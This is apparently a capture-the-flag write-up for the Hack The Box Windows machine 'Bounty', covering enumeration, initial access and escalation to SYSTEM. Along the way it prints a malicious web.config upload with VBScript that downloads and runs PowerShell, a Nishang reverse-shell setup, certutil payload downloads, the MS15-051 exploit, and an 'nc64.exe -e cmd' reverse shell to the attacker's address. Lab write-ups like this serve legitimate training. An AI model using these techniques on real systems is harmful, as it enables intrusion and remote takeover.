Ech0 - 25 / 11 / 19

Bounty Writeup

Introduction :



Bounty is an easy Windows box that was released back in June 2018.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

  λ ech0 [ 93.22.134.89 ] [~] → nmap -sC -sV 10.10.10.93
  Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:23 CET
  Nmap scan report for 10.10.10.93
  Host is up (0.095s latency).
  Not shown: 999 filtered ports
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Microsoft IIS httpd 7.5
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/7.5
  |_http-title: Bounty
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds

Part 2 : Getting User Access



It seems like our nmap scan found the 80th port opened, we will run a gobuster scan in order to enumerate the directories we will be able to work with.

λ ech0 [ 93.22.134.89 ] [~] → gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/directory-list-2.3-medium.txt


=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.93/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2019/11/25 08:28:36 Starting gobuster
=====================================================
/transfer.aspx (Status: 200)
/uploadedFiles (Status: 301)

Gobuster seems to have found 2 interesting pages :
-/transfer.aspx (which returns a status 200)
-/uploadedfiles (which returns a status 301)



Searching for the keywords "IIS 7.5 RCE", the results tell us that we should be able to upload a file web.config

We will submit our script to the website and ready our terminal running the command nc with the -lvnp flags in order to catch the incoming connection to our 9001 port.

web.config:
    <?xml version="1.0" encoding="UTF-8"?>
  <configuration>
     <system.webServer>
        <handlers accessPolicy="Read, Script, Write">
           <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
        </handlers>
        <security>
           <requestFiltering>
              <fileExtensions>
                 <remove fileExtension=".config" />
                 <hiddenSegments>
              </fileExtensions>
                 <remove segment="web.config" />
              </hiddenSegments>
           </requestFiltering>
        </security>
     </system.webServer>
  </configuration>
  <%@ Language=VBScript %>
  <%
  Set s = CreateObject("WScript.Shell")
  Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('ht>
  o = cmd.StdOut.Readall()
  Response.write(o)
  %>
  

Our ech0.ps1 script is a copy of Nishang's Invoke-PowerShellTcp.ps1

Terminal 1:
λ ech0 [ 10.10.14.48/23 ] [~/_HTB/Bounty] → curl -sk https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > ech0.ps1

λ ech0 [ 10.10.14.48/23 ] [~/_HTB/Bounty] → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.48 -Port 9001' >> ech0.ps1

As it is written above, our ech0.ps1 script will attempt to send a reverse shell connection to our machine at the of 10.10.14.48 adress, onto it's 9001st port. So we will ready our terminal with the nc command and it's -lvnp flags in order to catch the incoming connection.

  λ ech0 [ 10.10.14.48/23 ] [~/_HTB/Bounty] → nc -lvnp 9001

We submit our web.config file

We then browse to it, and then we wait for the reverse shell to come back to our terminal.

Terminal 1:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Terminal 2:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9001
Terminal 3:

λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ curl -vsk http://10.10.10.93/UploadedFiles/web.config
*   Trying 10.10.10.93:80...
* TCP_NODELAY set
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET /UploadedFiles/web.config HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.67.0
> Accept: */*
>
Terminal 1:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.93 - - [02/Dec/2019 08:22:36] "GET /ech0.ps1 HTTP/1.1" 200 -
Terminal 2:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9001
Connection from 10.10.10.93:49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

PS C:\windows\system32\inetsrv> whoami
bounty\merlin

And we're in ! we are logged in as the user merlin, now let's grab the user flag located in C:\users\merlin\desktop

  PS C:\windows\system32\inetsrv> cd ../../..
  PS C:\> ls


      Directory: C:\


  Mode                LastWriteTime     Length Name
  ----                -------------     ------ ----
  d----         5/30/2018   4:14 AM            inetpub
  d----         7/14/2009   6:20 AM            PerfLogs
  d-r--         6/10/2018   3:43 PM            Program Files
  d-r--         7/14/2009   8:06 AM            Program Files (x86)
  d-r--         5/31/2018  12:18 AM            Users
  d----         5/31/2018  11:37 AM            Windows


  PS C:\> cd Users\Merlin
  PS C:\Users\Merlin> cd Desktop
  PS C:\Users\Merlin\Desktop> more user.txt
  e2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Part 3 : Getting Root Access



In order to escalate privileges from merlin to the SYSTEM user, we need to first look at the results of the systeminfo command.

Terminal 1:
  PS C:\Users> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          12/2/2019, 8:56:08 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,588 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,595 MB
Virtual Memory: In Use:    500 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

We see that there are no Hotfixes onto the machine, which indicates a serious security flaw. So we will attempt to escalate privileges using the MS15-051. we will not forget that we will be applying a privilege escalation binary onto a 64 bit machine.

Download from https://eternallybored.org/misc/netcat/

Terminal 2:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ wget https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
--2019-12-02 09:07:00--  https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.118.3
Connecting to github.com (github.com)|140.82.118.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe [following]
--2019-12-02 09:07:00--  https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55296 (54K) [application/octet-stream]
Saving to: ‘ms15-051.exe’

ms15-051.exe             100%[===============================>]  54.00K  --.-KB/s    in 0.06s

2019-12-02 09:07:01 (852 KB/s) - ‘ms15-051.exe’ saved [55296/55296]


λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Now we just need to download both the ms15-051.exe and nc.exe binary onto our local machine, at the IP 10.10.14.48 at the 8000th port.

Terminal 1:
PS C:\Users> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe ech0_privesc.exe
****  Online  ****
CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5)
CertUtil: Access is denied.

Let's not forget to download it onto the machine within a folder where we have the write rights.

PS C:\Users> cd ..
PS C:\> cd Windows
PS C:\Windows> cd temp

Now we should be able to download our 2 binaries

PS C:\Windows\temp> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe ech0_privesc.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
  PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

Our binaries got uploaded ! now before we execute it we will ready our reverse shell terminal with the same nc command to catch the incoming connection.

Terminal 2:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
  → nc -lvnp 9999
Terminal 1:
  PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> ls


    Directory: C:\windows\temp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         6/10/2018   3:44 PM            vmware-SYSTEM
-a---         5/30/2018   3:19 AM          0 DMI5FAC.tmp
-a---         12/2/2019  10:12 AM      55296 ech0_privesc.exe
-a---         12/2/2019  11:02 AM      43696 nc64.exe
-a---         6/10/2018   3:44 PM     203777 vminst.log
-a---         12/2/2019   8:56 AM      57269 vmware-vmsvc.log
-a---         6/11/2018  12:47 AM      22447 vmware-vmusr.log
-a---         12/2/2019   8:56 AM        910 vmware-vmvss.log


PS C:\windows\temp> ./ech0_privesc.exe "c:\windows\temp\nc64.exe -e cmd 10.10.14.48 9999"

Terminal 2:
  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9999

Connection from 10.10.10.93:49189
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


C:\windows\temp>whoami
whoami
nt authority\system

C:\windows\temp>cd ..
cd ..

C:\Windows>cd ..
cd ..

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users

05/30/2018  11:18 PM    <DIR>          .
05/30/2018  11:18 PM    <DIR>          ..
05/30/2018  11:18 PM    <DIR>          Administrator
05/30/2018  03:44 AM    <DIR>          Classic .NET AppPool
05/29/2018  11:22 PM    <DIR>          merlin
05/30/2018  04:44 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  11,884,384,256 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! we have been able to get a root shell onto the box and we have been able to print out the root flag.

Conclusion



Here we can see the progress graph :